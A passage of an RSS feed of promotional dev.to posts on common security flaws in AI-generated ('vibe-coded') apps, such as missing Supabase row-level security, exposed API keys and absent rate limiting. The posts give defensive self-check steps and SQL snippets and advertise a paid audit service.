&lt;p&gt;&lt;strong&gt;Zero rate limiting on auth endpoints.&lt;/strong&gt; No brute-force protection on login. No cooldown on password reset. No limit on API calls. The AI never adds these because nobody prompts for them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No input validation on database-touching forms.&lt;/strong&gt; The AI builds the form. The form submits to Supabase. Nothing in between checks whether the input is valid, safe, or even the expected type.&lt;/p&gt;

&lt;h2&gt;
  
  
  The numbers
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Escape.tech scanned 5,600 AI-built apps. 60% failed basic security checks.&lt;/li&gt;
&lt;li&gt;Wikipedia tracked 1,645 Lovable-created web apps. 170 had personal data access issues.&lt;/li&gt;
&lt;li&gt;ReversingLabs documented a cascading supply chain attack (TeamPCP) that hit LiteLLM and Telnyx in the same week, compromising 47,000 and 742,000 downloads respectively.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What Cursor's CEO got wrong
&lt;/h2&gt;

&lt;p&gt;Michael Truell compared vibe coding to "erecting four walls and a roof while being oblivious to the details lurking beneath the floorboards or within the wiring."&lt;/p&gt;

&lt;p&gt;The metaphor is wrong. The floorboards are fine. The wiring works. The problem is that the house has no locks on the doors, no fence around the yard, and the windows don't close. Everything functions. Nothing is secure.&lt;/p&gt;

&lt;p&gt;The fix isn't "learn to code properly" as Truell implies. The fix is: review your security defaults before you deploy. 20 minutes checking RLS, env vars, auth flows, and rate limiting. That's it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;If you've shipped a vibe-coded app to production:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Check your Supabase RLS policies.&lt;/strong&gt; Open the SQL editor and verify every table has policies that check &lt;code&gt;auth.uid() = user_id&lt;/code&gt;, not just &lt;code&gt;auth.role() = 'authenticated'&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Search your deployed JS bundle for JWTs and API keys.&lt;/strong&gt; Open DevTools, go to Sources, and search for &lt;code&gt;eyJ&lt;/code&gt; (the base64 prefix of every JWT). If you find your Supabase anon key, that's expected. If you find anything else, you have a problem.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Add rate limiting to your auth endpoints.&lt;/strong&gt; Even a simple 5-requests-per-minute limit on login and password reset prevents brute force.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Run a security scanner.&lt;/strong&gt; We built free tools at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; specifically for vibe-coded apps. No signup required. If you want a deeper review, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 audit&lt;/a&gt; covers 50+ checks with a PDF report.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The NCSC, Cursor's CEO, and the supply chain attacks are all pointing at the same thing: the code works, the security doesn't. The good news is it's fixable. The bad news is most people won't fix it until something breaks.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Full security report with 63+ sources: &lt;a href="https://notelon.ai/report" rel="noopener noreferrer"&gt;notelon.ai/report&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
      <category>ai</category>
    </item>
    <item>
      <title>What a $1,000 Code Review Actually Finds in Lovable and Claude Code Apps</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sat, 28 Mar 2026 20:28:18 +0000</pubDate>
      <link>https://dev.to/solobillions/what-a-1000-code-review-actually-finds-in-lovable-and-claude-code-apps-3247</link>
      <guid>https://dev.to/solobillions/what-a-1000-code-review-actually-finds-in-lovable-and-claude-code-apps-3247</guid>
      <description>&lt;p&gt;A post on r/vibecoding went viral this week. Someone paid a senior dev $1,000 on Upwork to review their vibe-coded app. The verdict: "good code, just needs a few security concerns addressed."&lt;/p&gt;

&lt;p&gt;That's the outcome for almost every vibe-coded app I've looked at. The code works. The UI is fine. The security is broken.&lt;/p&gt;

&lt;p&gt;Here's what actually shows up in these reviews.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Same 5 Issues, Every Time
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Supabase RLS policies that don't exist or don't work&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Lovable sets up Supabase for you. It creates tables, writes queries, handles auth. What it doesn't do reliably is lock down who can read what.&lt;/p&gt;

&lt;p&gt;Open your Supabase dashboard right now. Go to Authentication &amp;gt; Policies. If you see tables with no policies, that table is readable by anyone with your Supabase URL and anon key. Both are in your client bundle. Anyone can open devtools and find them.&lt;/p&gt;

&lt;p&gt;The fix is row-level security policies on every table. But the AI generates policies that look right and aren't. A common one: SELECT is locked down with &lt;code&gt;auth.uid() = user_id&lt;/code&gt;, while the UPDATE or DELETE policy only checks that the user is authenticated. Users can read only their own data but can modify anyone's.&lt;/p&gt;
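&lt;p&gt;One way to audit this is to list which commands each table actually has policies for (a sketch against the standard &lt;code&gt;pg_policies&lt;/code&gt; view):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Commands covered per table; then read the qual for each one
-- (a command with no policy is denied; one with a weak policy is open)
SELECT tablename,
       array_agg(DISTINCT cmd ORDER BY cmd) AS covered_commands
FROM pg_policies
WHERE schemaname = 'public'
GROUP BY tablename;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;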

&lt;p&gt;&lt;strong&gt;2. API keys in the client bundle&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Open your deployed app. Open devtools. Go to Sources. Search for "sk_" or "key" or "secret" or "Bearer". If you find anything, that key is public.&lt;/p&gt;

&lt;p&gt;Vibe coding tools don't always know which API calls should happen server-side. They'll put a Stripe secret key or an OpenAI API key directly in a React component because the code works and the AI optimizes for working code.&lt;/p&gt;

&lt;p&gt;One app I reviewed had a Resend API key in the client. Anyone could send emails as that company. Another had an OpenAI key that was burning $40/day from unauthorized usage before the founder noticed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. No rate limiting on auth endpoints&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sign up, login, password reset. AI tools generate these flows and they work great. What they don't add is rate limiting.&lt;/p&gt;

&lt;p&gt;Someone can hit your login endpoint 10,000 times per second with different passwords. No lockout, no delay, no CAPTCHA. For password reset: an attacker can trigger thousands of reset emails to any address, which gets your email domain blacklisted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Missing input validation on the backend&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI validates inputs on the frontend. It checks email format, required fields, string length. But if someone bypasses the frontend (which is trivial), the backend accepts anything.&lt;/p&gt;

&lt;p&gt;This means SQL injection, XSS stored in your database, and malformed data that breaks your app for other users. Supabase edge functions generated by AI almost never validate input types.&lt;/p&gt;
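&lt;p&gt;One backstop the frontend cannot bypass is validation in the database schema itself. A sketch, where the table and column names (&lt;code&gt;user_data&lt;/code&gt;, &lt;code&gt;email&lt;/code&gt;, &lt;code&gt;display_name&lt;/code&gt;) are placeholders for your own:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Constraints reject malformed data no matter which client sends it
ALTER TABLE public.user_data
  ADD CONSTRAINT email_format
    CHECK (email ~* '^[^@\s]+@[^@\s]+\.[^@\s]+$'),
  ADD CONSTRAINT name_length
    CHECK (char_length(display_name) BETWEEN 1 AND 100);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This is a safety net, not a replacement for validating input in your edge functions; it just guarantees that bad data fails loudly instead of landing in the table.&lt;/p&gt;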

&lt;p&gt;&lt;strong&gt;5. Dependencies with known vulnerabilities&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every vibe-coded app I've seen has at least 3 npm packages with known CVEs. The AI picks packages that work, not packages that are maintained. Running &lt;code&gt;npm audit&lt;/code&gt; will list them, but most vibe coders never run it.&lt;/p&gt;

&lt;p&gt;The recent TeamPCP supply chain attack targeted PyPI packages (telnyx, litellm) with malicious versions. If you're using AI to pick your dependencies, you're trusting that the AI knows which version is safe. It doesn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters Now
&lt;/h2&gt;

&lt;p&gt;When your app has 0 users, none of this matters. But the moment someone enters their email, their payment info, their personal data, you're liable.&lt;/p&gt;

&lt;p&gt;GDPR fines for a breach caused by inadequate security can reach 10 million euros or 2% of global annual turnover, whichever is higher. Even in the US, state privacy laws are getting teeth. "I used AI to build it" is not a defense.&lt;/p&gt;

&lt;p&gt;170 out of 1,645 Lovable-created apps were found to have data exposure issues earlier this year. That's over 10%.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Market Gap
&lt;/h2&gt;

&lt;p&gt;Here's the reality of getting a code review as a vibe coder:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free:&lt;/strong&gt; Ask Claude/ChatGPT to review your code. It'll find surface-level issues but miss the architectural ones. It generated the code, so it has the same blind spots.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;$500-$1,000:&lt;/strong&gt; Hire a senior dev on Upwork. Takes a week. May not specialize in the specific security patterns of AI-generated code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;$5,000+:&lt;/strong&gt; Professional penetration test. Enterprise-grade but overkill for a solo founder's MVP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There's nothing in between for the vibe coder who just wants to know: "Is my app safe to launch?"&lt;/p&gt;

&lt;p&gt;That's the gap. A focused security audit that knows exactly where Lovable, Cursor, Bolt, and Claude Code break. Not a general code review. A checklist of the exact vulnerabilities these tools introduce, tested against your specific app, with copy-paste fix prompts you can feed back into the AI.&lt;/p&gt;

&lt;h2&gt;
  
  
  Check Your App Right Now
&lt;/h2&gt;

&lt;p&gt;Before you ship, run through this yourself:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Open Supabase &amp;gt; Authentication &amp;gt; Policies. Every table should have RLS enabled with policies for SELECT, INSERT, UPDATE, DELETE.&lt;/li&gt;
&lt;li&gt;Open devtools on your deployed app. Search Sources for API keys (sk_, key_, secret, Bearer).&lt;/li&gt;
&lt;li&gt;Try signing up 10 times in 10 seconds. If it works every time, you have no rate limiting.&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;npm audit&lt;/code&gt; in your project. Fix anything marked critical or high.&lt;/li&gt;
&lt;li&gt;Check your .env file isn't committed to git: &lt;code&gt;git log --all -- .env&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you want a deeper check, I built a free scanner at &lt;a href="https://notelon.ai/tools/vibecheck" rel="noopener noreferrer"&gt;notelon.ai/tools/vibecheck&lt;/a&gt; that runs automated checks against your repo. For a full manual audit with a PDF report and fix prompts, there's a &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 audit service&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I build security tools for vibe coders at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>vibecoding</category>
      <category>security</category>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>If You're Selling Vibe-Coded Apps to Clients, You're One Breach Away From a Lawsuit</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sat, 28 Mar 2026 07:57:31 +0000</pubDate>
      <link>https://dev.to/solobillions/if-youre-selling-vibe-coded-apps-to-clients-youre-one-breach-away-from-a-lawsuit-31i5</link>
      <guid>https://dev.to/solobillions/if-youre-selling-vibe-coded-apps-to-clients-youre-one-breach-away-from-a-lawsuit-31i5</guid>
      <description>&lt;p&gt;You built a client's app in 3 hours with Lovable. Charged $500. Client loved it. Shipped it.&lt;/p&gt;

&lt;p&gt;Six weeks later, their customer data leaks. The client's lawyer sends you a letter.&lt;/p&gt;

&lt;p&gt;This isn't hypothetical. It's the trajectory.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Numbers Nobody's Talking About
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;60%&lt;/strong&gt; of AI-generated apps fail basic security tests (Escape.tech, 5,600 apps scanned)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;67%&lt;/strong&gt; of vibe-coded repos have critical vulnerabilities (ShipSafe, 100 repos audited)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;35 new CVEs in March 2026 alone&lt;/strong&gt; from AI-generated code (Georgia Tech Vibe Radar)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;47,000 poisoned downloads in 46 minutes&lt;/strong&gt; when LiteLLM was supply chain attacked last week&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You're not building insecure apps on purpose. The AI tools you're using are generating insecure code by default. Missing Row Level Security. Hardcoded API keys. No input validation. Client-side only authentication.&lt;/p&gt;

&lt;p&gt;The AI optimizes for "it works." Not "it's secure."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Liability Problem
&lt;/h2&gt;

&lt;p&gt;When you build an app for a client, you own the outcome. "I used AI to build it" is not a legal defense. Neither is "I didn't know it was insecure."&lt;/p&gt;

&lt;p&gt;If client data gets exposed because you shipped an app with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No RLS on Supabase tables (anyone can read any user's data)&lt;/li&gt;
&lt;li&gt;Hardcoded API keys in client-side code (visible in browser dev tools)&lt;/li&gt;
&lt;li&gt;No rate limiting (bot can dump the entire database)&lt;/li&gt;
&lt;li&gt;Missing security headers (clickjacking, XSS)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;...that's on you. Not the AI tool. Not the platform. You.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Fix (That Also Makes You More Money)
&lt;/h2&gt;

&lt;p&gt;Add a security audit as an upsell on every project.&lt;/p&gt;

&lt;p&gt;Not "learn security." Not "become a pentester." Outsource it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The pitch to clients:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"I've built your app. Before we go live, I recommend a security audit to make sure your users' data is protected. It's $99 and takes 24 hours. You'll get a full report showing exactly what's secure and what needs fixing."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Client hears: professional, thorough, protective of their business.&lt;/p&gt;

&lt;p&gt;You hear: $99 in margin on a deliverable you didn't build.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Math
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Your Fee&lt;/th&gt;
&lt;th&gt;Audit Cost&lt;/th&gt;
&lt;th&gt;Your Margin&lt;/th&gt;
&lt;th&gt;Client Gets&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;No audit&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;Vulnerable app + liability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;With audit&lt;/td&gt;
&lt;td&gt;$599&lt;/td&gt;
&lt;td&gt;$99&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;Secure app + peace of mind&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Same margin. Better deliverable. Lower liability. Recurring revenue if client wants monthly scans.&lt;/p&gt;

&lt;h2&gt;
  
  
  What a $99 Audit Covers
&lt;/h2&gt;

&lt;p&gt;A real audit checks 50+ security vectors specific to vibe-coded apps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Authentication &amp;amp; Authorization&lt;/strong&gt;: RLS policies, JWT validation, admin routes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secrets Management&lt;/strong&gt;: Exposed API keys, env vars in client code, .git exposure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Validation&lt;/strong&gt;: SQL injection, XSS, path traversal&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Security&lt;/strong&gt;: Rate limiting, CORS configuration, error handling&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply Chain&lt;/strong&gt;: Dependency versions, known vulnerabilities, lockfile integrity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Infrastructure&lt;/strong&gt;: Security headers, HTTPS enforcement, cookie flags&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You get a report with every finding, severity rating, and a copy-paste AI prompt to fix each issue.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://notelon.ai/services/audit/sample" rel="noopener noreferrer"&gt;See a sample audit report&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Free Tools to Start With
&lt;/h2&gt;

&lt;p&gt;Before you upsell audits, run your own builds through these:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/vibecheck" rel="noopener noreferrer"&gt;VibeCheck Scanner&lt;/a&gt;&lt;/strong&gt; -- Paste your repo URL. Get a security score in 30 seconds. Free.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/security-assessment" rel="noopener noreferrer"&gt;Security Assessment Quiz&lt;/a&gt;&lt;/strong&gt; -- 10 questions. 2 minutes. Know your risk grade.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/breach-cost-calculator" rel="noopener noreferrer"&gt;Breach Cost Calculator&lt;/a&gt;&lt;/strong&gt; -- Show your client what a breach would cost them. Makes the $99 audit feel like nothing.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Platform-Specific Risks
&lt;/h2&gt;

&lt;p&gt;Every vibe coding tool has different security blind spots:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/lovable-security" rel="noopener noreferrer"&gt;Lovable&lt;/a&gt;&lt;/strong&gt;: RLS disabled by default, Supabase keys in client code, 200K daily projects with 63% non-developer users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/bolt-security" rel="noopener noreferrer"&gt;Bolt.new&lt;/a&gt;&lt;/strong&gt;: No built-in security scanning, manual deployment to any platform, no guardrails&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/cursor-security" rel="noopener noreferrer"&gt;Cursor&lt;/a&gt;&lt;/strong&gt;: MCP plugin supply chain attacks, .cursorrules injection, terminal command execution&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/windsurf-security" rel="noopener noreferrer"&gt;Windsurf&lt;/a&gt;&lt;/strong&gt;: Cascade autonomous execution, Memories storing sensitive data, cloud/local confusion&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/replit-security" rel="noopener noreferrer"&gt;Replit&lt;/a&gt;&lt;/strong&gt;: Agent controls entire stack (code + DB + deployment), public-by-default repos, rogue agent incident (July 2025)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Bottom Line
&lt;/h2&gt;

&lt;p&gt;You're building apps faster than ever. That's the upside.&lt;/p&gt;

&lt;p&gt;The downside: you're shipping vulnerabilities faster than ever too. Your clients trust you to deliver something that works AND doesn't leak their data.&lt;/p&gt;

&lt;p&gt;A $99 security audit takes 24 hours and covers 50+ checks. It protects your client, protects you from liability, and adds margin to every project.&lt;/p&gt;

&lt;p&gt;Or skip it. And hope nobody finds the RLS bypass before your client's data shows up on a breach notification site.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;&lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;Get a security audit for your next client project&lt;/a&gt;&lt;/strong&gt; -- $99 for a full 50+ check assessment with actionable fix prompts. Results in 24 hours.&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>freelancing</category>
      <category>vibecoding</category>
    </item>
  </channel>
</rss>
